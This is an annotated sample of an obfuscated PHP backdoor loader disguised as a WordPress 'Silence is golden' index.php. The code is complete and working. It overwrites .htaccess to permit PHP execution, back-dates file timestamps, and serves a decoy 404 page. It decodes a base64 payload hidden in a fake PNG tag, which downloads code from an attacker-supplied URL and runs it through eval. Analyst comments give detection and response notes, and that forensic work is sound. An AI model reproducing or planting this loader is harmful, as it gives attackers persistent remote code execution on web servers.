

// Silence is golden.
// NOTE(review): the comment above is the stock text of WordPress placeholder
// index.php files; in this sample it looks like camouflage for a casual
// reader, not an indication that the file is harmless.
//
// Stage 1 - set-up and persistence. All PHP error output is switched off so
// failures in the steps below leave nothing visible in the response.
error_reporting(null);
ini_set("display_errors", 0);
// Replacement .htaccess: a FilesMatch stanza that explicitly allows requests
// for files whose names end in ph / phtml / php in this directory. This is
// presumably meant to undo a hardening rule that blocks PHP execution here.
$file_contents =
    "<FilesMatch \".(ph|phtml|php)\$\">\n Order allow,deny\n Allow from all\n</FilesMatch>";
// Mode "w" truncates, so an existing .htaccess in the working directory is
// overwritten; "@" hides the warning if the directory is not writable.
$create_htacess = @fopen(".htaccess", "w");
if ($create_htacess) {
    fwrite($create_htacess, $file_contents);
    fclose($create_htacess);
    // Both the dropped .htaccess and this script are made read-only (0444).
    // Triage hint: a read-only .htaccess holding only the stanza above, next
    // to a read-only PHP file, is a useful indicator when sweeping a web root.
    chmod(".htaccess", 0444);
    chmod(basename($_SERVER["PHP_SELF"]), 0444);
}
/**
 * Decoy response: makes the script look like a missing page.
 *
 * Requests the path "/404NotFound" on the same host that served this script,
 * rewrites the probe name in the returned HTML to this script's own path, and
 * echoes the result. A visitor who opens the file without parameters therefore
 * sees the site's own "not found" page.
 *
 * Detection notes:
 *  - nothing in this function sets an HTTP status code, so the decoy is
 *    presumably delivered with the default status while carrying a 404 body;
 *  - the server issues a request to itself for "/404NotFound" with the fixed
 *    Firefox/32.0 user agent set below, which should be visible in access logs.
 *
 * Takes no arguments and returns nothing; output is written with echo.
 */
function login_shell()
{
    // Fixed probe path, expected not to exist on the site.
    $random_url = "404NotFound";
    $curl = curl_init();
    // Scheme mirrors the incoming request (https when $_SERVER["HTTPS"] is set and not "off").
    $protocol = "http://";
    if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] != "off") {
        $protocol = "https://";
    }
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    // Hard-coded browser user agent; the same string is a log indicator.
    curl_setopt(
        $curl,
        CURLOPT_USERAGENT,
        "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
    );
    // Certificate and host-name verification are both disabled for this request.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_FRESH_CONNECT, true);
    // Target host is taken from the Host header of the incoming request.
    curl_setopt(
        $curl,
        CURLOPT_URL,
        $protocol . $_SERVER["HTTP_HOST"] . "/" . $random_url
    );
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $server_404 = curl_exec($curl);
    // Replace the probe path (with, then without, the leading slash) by this
    // script's path so the error page names the URL the visitor requested.
    $server_404 = str_replace(
        "/{$random_url}",
        $_SERVER["SCRIPT_NAME"],
        $server_404
    );
    $server_404 = str_replace(
        "{$random_url}",
        $_SERVER["SCRIPT_NAME"],
        $server_404
    );
    echo $server_404;
    
}
/**
 * Hand-written base64 decoder followed by URL-decoding.
 *
 * The alphabet in $keyStr is the standard base64 alphabet with "=" appended
 * at index 64 as the padding marker. Implementing the decoder by hand means
 * the name base64_decode never appears in the file, presumably to get past
 * scanners that key on that function name; signatures for this sample should
 * therefore match the alphabet constant or the bit-shifting loop instead.
 *
 * @param string $input base64 text using the standard alphabet
 * @return string the decoded bytes after urldecode()
 */
function utf8key($input)
{
    $keyStr =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    $chr1 = $chr2 = $chr3 = "";
    $enc1 = $enc2 = $enc3 = $enc4 = "";
    $i = 0;
    $output = "";
    // NOTE(review): the square brackets appear to be consumed as the PCRE
    // delimiters here, so this is not the character-class filter it resembles;
    // analysts re-implementing the decoder should not assume input is cleaned.
    $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
    do {
        // Look up four input characters as 6-bit values (index in $keyStr).
        $enc1 = strpos($keyStr, substr($input, $i++, 1));
        $enc2 = strpos($keyStr, substr($input, $i++, 1));
        $enc3 = strpos($keyStr, substr($input, $i++, 1));
        $enc4 = strpos($keyStr, substr($input, $i++, 1));
        // Repack the four 6-bit values into three bytes.
        $chr1 = ($enc1 << 2) | ($enc2 >> 4);
        $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
        $chr3 = (($enc3 & 3) << 6) | $enc4;
        $output = $output . chr((int) $chr1);
        // Index 64 is "=", i.e. padding: the matching output byte is skipped.
        if ($enc3 != 64) {
            $output = $output . chr((int) $chr2);
        }
        if ($enc4 != 64) {
            $output = $output . chr((int) $chr3);
        }
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
    } while ($i < strlen($input));
    // Percent-escapes in the decoded text, if any, are resolved before returning.
    return urldecode($output);
}
/**
 * Back-dates this script and .htaccess, then decodes the embedded payload.
 *
 * Despite the WordPress-sounding name, the function does two unrelated things:
 *  1. Timestamp tampering: it copies the modification time of another entry
 *     in the working directory onto this file and the dropped .htaccess, so
 *     neither shows up in a "recently modified files" search.
 *  2. Decoding: it restores the two characters that were swapped out of the
 *     base64 text ("%" back to "/", "#" back to "+") and passes the result to
 *     utf8key().
 *
 * Forensics note: the mtime of these two files is not trustworthy. On POSIX
 * file systems the inode change time (ctime) is not settable through touch(),
 * so ctime, file-integrity baselines and backups are better evidence of when
 * the files actually appeared.
 *
 * @param string $auth_data the obfuscated base64 text
 * @return string the decoded payload source
 */
function pre_term_name($auth_data)
{
    // Sorted listing of the working directory. With the default ascending
    // order index 1 is presumably ".." - verify on the affected host.
    $filendate = scandir(getcwd());
    if (!is_dir($filendate[1])) {
        // Second entry is a regular file: reuse its mtime for both files
        // (the .htaccess call is simply repeated).
        touch(".htaccess", filemtime($filendate[1]));
        touch(__FILE__, filemtime($filendate[1]));
        touch(".htaccess", filemtime($filendate[1]));
    } elseif (file_exists($filendate[1]) && $filendate[1] == __FILE__) {
        // NOTE(review): scandir() yields bare names while __FILE__ is a full
        // path, so this branch looks unlikely to be taken - confirm.
        touch(__FILE__, filemtime($filendate[3]));
        touch(".htaccess", filemtime($filendate[1]));
    } elseif (file_exists($filendate[1])) {
        // Usual case when entry 1 is a directory: inherit that entry's mtime.
        touch(__FILE__, filemtime($filendate[1]));
        touch(".htaccess", filemtime($filendate[1]));
    }
    // Undo the character substitution that kept "/" and "+" out of the blob.
    $kses_str = str_replace(["%", "#"], ["/", "+"], $auth_data);
    // "@" suppresses any warning raised while decoding.
    return @utf8key($kses_str);
}
// Stage 2 - dispatch. A request without a "url" query parameter gets the
// decoy 404 page (only when cURL is available). There is no exit after the
// decoy, so the remaining statements run on every request.
if (function_exists("curl_exec")) {
    if (!isset($_GET["url"])) {
        login_shell();
    }
}
// The payload is stored as text dressed up as an inline PNG inside an <img>
// tag. It is not image data: after the "#"/"%" substitution is reversed it
// is base64 of PHP source. Decoded, that source defines a helper that
// downloads a URL (cURL, else file_get_contents, else fopen), calls it with
// the "url" query parameter, and passes the downloaded text to eval()
// prefixed with a closing PHP tag. In short: a loader that runs whatever
// code the remote URL returns.
// The identifiers used below (wp_default_logo, wpautop) borrow WordPress
// naming and have nothing to do with logos or paragraph formatting.
$wp_default_logo =
    '<img src="data:image/png;ZXJyb3JfcmVwb3J0aW5nKCAwICk7DQoNCmZ1bmN0aW9uIF91cmxfZ2V0X2NvbnRlbnRzICgkdXJsKSB7DQogICAgaWYgKCBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfZXhlYycpICl7IA0KICAgICAgICAkY3VybF9jb25uZWN0ID0gY3VybF9pbml0KCAkdXJsICk7DQoNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX1VTRVJBR0VOVCwgIk1vemlsbGEvNS4wKFdpbmRvd3MgTlQgNi4xOyBydjozMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzMyLjAiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIDApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX0NPT0tJRUpBUiwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfQ09PS0lFRklMRSwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIA0KICAgICAgICAkY29udGVudF9kYXRhID0gY3VybF9leGVjKCAkY3VybF9jb25uZWN0ICk7DQogICAgfQ0KICAgIGVsc2VpZiAoIGZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSApIHsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCAkdXJsICk7DQogICAgfQ0KICAgIGVsc2Ugew0KICAgICAgICAkaGFuZGxlID0gZm9wZW4gKCAkdXJsICwgInIiKTsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IHN0cmVhbV9nZXRfY29udGVudHMoICRoYW5kbGUgKTsNCiAgICB9DQogICAgICAgIA0KICAgIHJldHVybiAkY29udGVudF9kYXRhOw0KfQ0KDQokY29udGVudF9vdXRwdXQgPSBfdXJsX2dldF9jb250ZW50cygkX0dFVFsndXJsJ10pOw0KZXZhbCAoJz8#JyAuICRjb250ZW50X291dHB1dCk7">';
// Pull the encoded text back out of the fake tag and decode it; the call to
// pre_term_name() also performs the timestamp tampering described there.
preg_match('#<img src="data:image/png;(.*)">#', $wp_default_logo, $logo_data);
$logo_image = $logo_data[1];
$wpautop = pre_term_name($logo_image);
if (isset($wpautop)) {
    // The function name is held in a variable and invoked indirectly, so no
    // direct create_function(...) call appears in the source. The decoded
    // payload is placed in the body argument between "}" and "//", which
    // causes it to run as soon as the call is made.
    // create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so
    // this stage fails on PHP 8 and later.
    // Response guidance: treat the host as compromised. Review access logs
    // for requests to this file that carry a "url" parameter, review outbound
    // connections made by the PHP process, remove this file and the dropped
    // .htaccess, and restore any .htaccess it overwrote from a known-good copy.
    $preg_import =
        "create_function";
    $preg_import("", "}" . $wpautop . "//");
}


